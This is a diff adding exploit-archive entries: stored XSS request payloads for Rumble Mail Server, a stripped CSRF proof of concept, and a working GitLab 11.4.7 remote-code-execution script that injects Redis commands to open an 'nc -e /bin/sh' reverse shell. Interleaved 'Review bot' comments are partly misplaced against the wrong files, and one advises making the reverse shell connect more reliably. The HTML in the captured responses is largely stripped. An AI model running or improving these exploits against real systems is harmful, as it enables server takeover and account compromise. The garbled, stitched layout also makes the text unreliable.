+ + + + \ No newline at end of file diff --git a/exploits/multiple/webapps/49254.txt b/exploits/multiple/webapps/49254.txt new file mode 100644 index 000000000..c94a10cea --- /dev/null +++ b/exploits/multiple/webapps/49254.txt @@ -0,0 +1,105 @@ +# Exploit Title: Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS +# Date: 2020-9-3 +# Exploit Author: Mohammed Alshehri +# Vendor Homepage: http://rumble.sf.net/ +# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe +# Version: Version 0.51.3135 +# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 + +# Info +The parameters `domain` and `path` are vulnerable to stored XSS. + +# Exploit: +POST /domains HTTP/1.1 +Host: 127.0.0.1:2580 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 119 +Origin: http://127.0.0.1:2580 +Authorization: Basic YWRtaW46YWRtaW4= +Connection: keep-alive +Referer: http://127.0.0.1:2580/domains?domain=%3Cscript%3Ealert( +Upgrade-Insecure-Requests: 1 + +domain=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&path=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&create=true +HTTP/1.1 200 OK +Connection: close +Content-Type: text/html + + + + + + +RumbleLua + + + +
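Review bot: The request authenticates with `Authorization: Basic YWRtaW46YWRtaW4=` (admin:admin) and posts to `/settings:save`, so the stored `servername` XSS is only reachable by an authenticated RumbleLua administrator; the header should state that prerequisite and name the page where the stored value is rendered, because the captured response is a 302 to `/settings:save` followed by a page whose markup has been stripped in this copy and no longer shows the payload being reflected. Without that sink it is unclear whether this fires for anyone other than the admin who planted it. The same request also submits `runas=root` and rewrites `mailpath`, `dbpath` and every listener port with the captured values (`Saving config/rumble.conf` in the response shows they are persisted), which a reader pasting the PoC into another install will silently apply; a one-line warning to carry over the target's own settings would prevent that.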
+
+ RumbleLua on a
+ Rumble Mail Server v/0.51.3135
+
+ + Server status + Domains & accounts + + RumbleLua users + Server settings + Set up modules + System logs + Mail queue + +
+
+
+

Domains

+

+
Create a new domain
Domain has been created.
+
+
+
+ Domain name: +
+
+ +
+
+ +
+
+ Optional alt. storage path: +
+
+ +
+
+ + +
+
+ + + +
+
+




+
+
+

+

 

+ + +
DomainActions
 "> &delete=true">
+
+
+

+Powered by Rumble Mail Server - [wiki] [project home] +

+ + + + \ No newline at end of file diff --git a/exploits/multiple/webapps/49255.txt b/exploits/multiple/webapps/49255.txt new file mode 100644 index 000000000..50b5847d1 --- /dev/null +++ b/exploits/multiple/webapps/49255.txt @@ -0,0 +1,146 @@ +# Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS +# Date: 2020-9-3 +# Exploit Author: Mohammed Alshehri +# Vendor Homepage: http://rumble.sf.net/ +# Software Link: https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe +# Version: Version 0.51.3135 +# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763 + +# Exploit: +POST /users HTTP/1.1 +Host: 127.0.0.1:2580 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 96 +Origin: http://127.0.0.1:2580 +Authorization: Basic YWRtaW46YWRtaW4= +Connection: keep-alive +Referer: http://127.0.0.1:2580/users +Upgrade-Insecure-Requests: 1 + +username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit +HTTP/1.1 200 OK +Connection: close +Content-Type: text/html + + + + + + +RumbleLua + + + +
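Review bot: The `Referer:` header is truncated (`/domains?domain=%3Cscript%3Ealert(`), which suggests the same payload was first passed via GET; the write-up should say whether the reflection happens only after creation (stored, as titled) or already on that GET (reflected), and that the request requires admin Basic auth (`YWRtaW46YWRtaW4=`, admin:admin). Submitting `<script>alert("XSS")</script>` as `path` — the 'Optional alt. storage path' field — presumably also makes the server treat that string as a mail-storage directory; whether it is created unsanitised (and so whether `path` is a path-injection issue as well) is worth checking and reporting separately instead of folding it into the XSS. The captured response has lost its HTML in this copy, so the `Domain` table cell that would show the payload is empty and no longer demonstrates the finding.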
+
+ RumbleLua on a.com
+ Rumble Mail Server v/0.51.3135
+
+ + Server status + Domains & accounts + + RumbleLua users + Server settings + Set up modules + System logs + Mail queue + +
+
+
+ + +

RumbleLua users

+

This page allows you to create, modify or delete accounts on the RumbleLua system.
+Users with lock Full control can add, edit and delete domains as well as change server settings,
+while regular users can only +see and edit the domains they have access to. +

+ + + + + + + +
Create a new user:
+
+ +
+ + +
+ + +
+ + +
+



+
+
+
+
+
+
+
+
+ +    + +

+ +
+
+ + + + + + + + + + + + + + + + + + + + + +
UsernameRightsActions
 Full control + &edit=true">  + &delete=true"> +
 adminFull control +   + +
 Full control + &edit=true">  + &delete=true"> +
+

 

+ + +
+
+

+Powered by Rumble Mail Server - [wiki] [project home] +

+ + + + \ No newline at end of file diff --git a/exploits/php/webapps/49245.txt b/exploits/php/webapps/49245.txt new file mode 100644 index 000000000..b67419f9e --- /dev/null +++ b/exploits/php/webapps/49245.txt @@ -0,0 +1,30 @@ +# Exploit Title: Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change +password) +# Date: 2020-12-14 +# Exploit Author: KeopssGroup0day,Inc +# Vendor Homepage: https://www.rukovoditel.net/ +# Software Link: https://www.rukovoditel.net/download.php +# Version: v2.6.1 +# Tested on: Kali Linux + +POC(localhost/index.php?module=users/change_password): + + + + + +
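Review bot: The PoC creates a RumbleLua account with `rights=*` (full control) and `password=admin` whose username is the script payload, and the captured `/users` table lists it next to `admin` (its name cell blanked by the stripped markup), so running this leaves a privileged, trivially guessable account on the target; the header should warn about that and give the cleanup (the row's `&delete=true` action link shown in the response). As with the sibling reports, admin Basic auth (`YWRtaW46YWRtaW4=`) is required and the page the payload fires on is the admin-only `/users` listing, which should be stated as the impact scope.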
+ + + + +
+ + + + +-- \ No newline at end of file diff --git a/exploits/ruby/webapps/49257.py b/exploits/ruby/webapps/49257.py new file mode 100755 index 000000000..e44dae0c7 --- /dev/null +++ b/exploits/ruby/webapps/49257.py 
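Review bot: The HTML form that is the actual PoC has been stripped to bare `+` lines in this copy, so all that survives is the target `index.php?module=users/change_password`; without the field names (new password, confirmation, submit) the CSRF cannot be reproduced and the file needs to be re-added with the form intact. The header should also state the preconditions that make this a CSRF at all: the victim must be logged in, and the change-password form must require neither the current password nor a per-session token — if it requires the current password the forged request cannot succeed, and nothing here shows that it does not.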
@@ -0,0 +1,64 @@
+# Exploit Title: Gitlab 11.4.7 - Remote Code Execution
+# Date: 14-12-2020
+# Exploit Author: Fortunato Lodari fox [at] thebrain [dot] net, foxlox
+# Vendor Homepage: https://about.gitlab.com/
+# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
+# Tested On: Debian 10 + Apache/2.4.46 (Debian)
+# Version: 11.4.7 community
+
+import sys
+import requests
+import time
+import random
+import http.cookiejar
+import os.path
+from os import path
+
+# Sign in GitLab 11.4.7 portal and get (using Burp or something other):
+# authenticity_token
+# authenticated cookies
+# username
+# specify localport and localip for reverse shell
+
+username='aaaaaaaaaaaa'
+authenticity_token='jpT/n1EoPwwWtiGu/+QKVQomofMNyqAQXY+iD2kVoRQoiQNzcFHPAj2+M4pyblKo/7UkClKW8jvp51Aw2qzs7g=='
+cookie = '_gitlab_session=c942527505cc0580c026610a1799b811; sidebar_collapsed=false'
+localport='1234'
+localip='192.168.0.114'
+
+
+url = "http://192.168.0.130:5080"
+proxies = { "http": "http://localhost:8080" }
+
+
+def deb(str):
+ print("Debug => "+str)
+
+def create_payload(authenticity_token,prgname,namespace_id,localip,localport,username):
+ return {'utf8':'✓','authenticity_token':authenticity_token,'project[ci_cd_only]':'false','project[name]':prgname,'project[namespace_id]':namespace_id,'project[path]':prgname,'project[description]':prgname,'project[visibility_level]':'20','':'project[initialize_with_readme]','project[import_url]':'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/\n multi\n sadd resque:gitlab:queues system_hook_push\n lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\'|nc '+localip+' '+localport+' -e /bin/sh\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"\n exec\n exec\n exec\n/'+username+'/'+prgname+'.git'}
+
+import string
+def random_string(length):
+ return ''.join(random.choice(string.ascii_letters) for m in range(length))
+
+def init(username,cookie,authenticity_token,localport,localip):
+ from bs4 import BeautifulSoup
+ import re
+ import urllib.parse
+ deb("Token: "+authenticity_token)
+ deb("Cookie: "+cookie)
+ session=requests.Session()
+ headers = {'user-agent':'Moana Browser 1.0','Cookie':cookie,'Content-Type':'application/x-www-form-urlencoded','DNT':'1','Upgrade-Insecure-Requests':'1'}
+ r=session.get(url+'/projects/new',headers=headers,allow_redirects=True)
+ soup = BeautifulSoup(r.content,"lxml")
+ nsid = soup.findAll('input', {"id": "project_namespace_id"})
+ namespace_id=nsid[0]['value'];
+ deb("Namespace ID: "+namespace_id)
+ prgname=random_string(8)
+ newpayload=create_payload(authenticity_token,prgname,namespace_id,localip,localport,username)
+ newpayload=urllib.parse.urlencode(newpayload)
+ deb("Payload encoded: "+newpayload)
+ r=session.post(url+'/projects',newpayload,headers=headers,allow_redirects=False)
+ os.system("nc -nvlp "+localport)
+
+init(username,cookie,authenticity_token,localport,localip)
\ No newline at end of file
diff --git a/exploits/windows/local/49248.txt b/exploits/windows/local/49248.txt
new file mode 100644
index 000000000..3b3f8ec5f
--- /dev/null
+++ b/exploits/windows/local/49248.txt
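Review bot: `init` only starts the listener with `os.system("nc -nvlp "+localport)` after the `/projects` POST has returned, so the reverse shell fired by the injected Sidekiq job (`nc <localip> <localport> -e /bin/sh`) races the listener and can be refused before anything is bound; start it first, e.g. `listener = subprocess.Popen(["nc", "-nvlp", localport])` before `session.post(...)` and `listener.wait()` after it (adding `import subprocess`). The POST's result is discarded, so an expired `_gitlab_session` or stale `authenticity_token` — both hard-coded at the top — leaves the script blocked in a listener that will never get a connection; check `r.status_code` and the redirect `Location` before waiting. `-e` also needs a netcat build that supports it (ncat or nc.traditional, not the OpenBSD nc Debian installs by default), and `proxies` is defined but never passed to the session, so the Burp proxy it points at is never used.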
@@ -0,0 +1,29 @@
+# Exploit Title: System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path
+# Date: 2020-10-14
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://systemexplorer.net/
+# Software Link: http://systemexplorer.net/download/SystemExplorerSetup.exe
+# Version: Version 7.0.0
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Service info:
+
+C:\Users\m507>sc qc SystemExplorerHelpService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: SystemExplorerHelpService
+ TYPE : 20 WIN32_SHARE_PROCESS
+ START_TYPE : 3 DEMAND_START
+ ERROR_CONTROL : 0 IGNORE
+ BINARY_PATH_NAME : C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : System Explorer Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 68282e8af..7875249b9 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11230,6 +11230,7 @@ id,file,description,date,author,type,platform,port
 49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows,
 49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Thomas Sluyter",local,multiple,
 49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
+49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43463,3 +43464,15 @@ id,file,description,date,author,type,platform,port
 49241,exploits/php/webapps/49241.txt,"Courier Management System 1.0 - 'First Name' Stored XSS",2020-12-11,Zhaiyi,webapps,php,
 49242,exploits/php/webapps/49242.txt,"Courier Management System 1.0 - 'MULTIPART street ((custom) ' SQL Injection",2020-12-11,Zhaiyi,webapps,php,
 49243,exploits/php/webapps/49243.txt,"Courier Management System 1.0 - 'ref_no' SQL Injection",2020-12-11,Zhaiyi,webapps,php,
+49245,exploits/php/webapps/49245.txt,"Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password)",2020-12-14,KeopssGroup0day_Inc,webapps,php,
+49246,exploits/multiple/webapps/49246.py,"LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection",2020-12-14,Hodorsec,webapps,multiple,
+49247,exploits/multiple/webapps/49247.py,"MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)",2020-12-14,securityforeveryone.com,webapps,multiple,
+49249,exploits/multiple/webapps/49249.txt,"Seacms 11.1 - 'ip and weburl' Remote Command Execution",2020-12-14,j5s,webapps,multiple,
+49250,exploits/multiple/webapps/49250.txt,"Seacms 11.1 - 'file' Local File Inclusion",2020-12-14,j5s,webapps,multiple,
+49251,exploits/multiple/webapps/49251.txt,"Seacms 11.1 - 'checkuser' Stored XSS",2020-12-14,j5s,webapps,multiple,
+49252,exploits/multiple/webapps/49252.txt,"WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download",2020-12-14,Wadeek,webapps,multiple,
+49253,exploits/multiple/webapps/49253.txt,"Rumble Mail Server 0.51.3135 - 'servername' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
+49254,exploits/multiple/webapps/49254.txt,"Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
+49255,exploits/multiple/webapps/49255.txt,"Rumble Mail Server 0.51.3135 - 'username' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
+49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware,
+49257,exploits/ruby/webapps/49257.py,"Gitlab 11.4.7 - Remote Code Execution",2020-12-14,"Fortunato Lodari",webapps,ruby,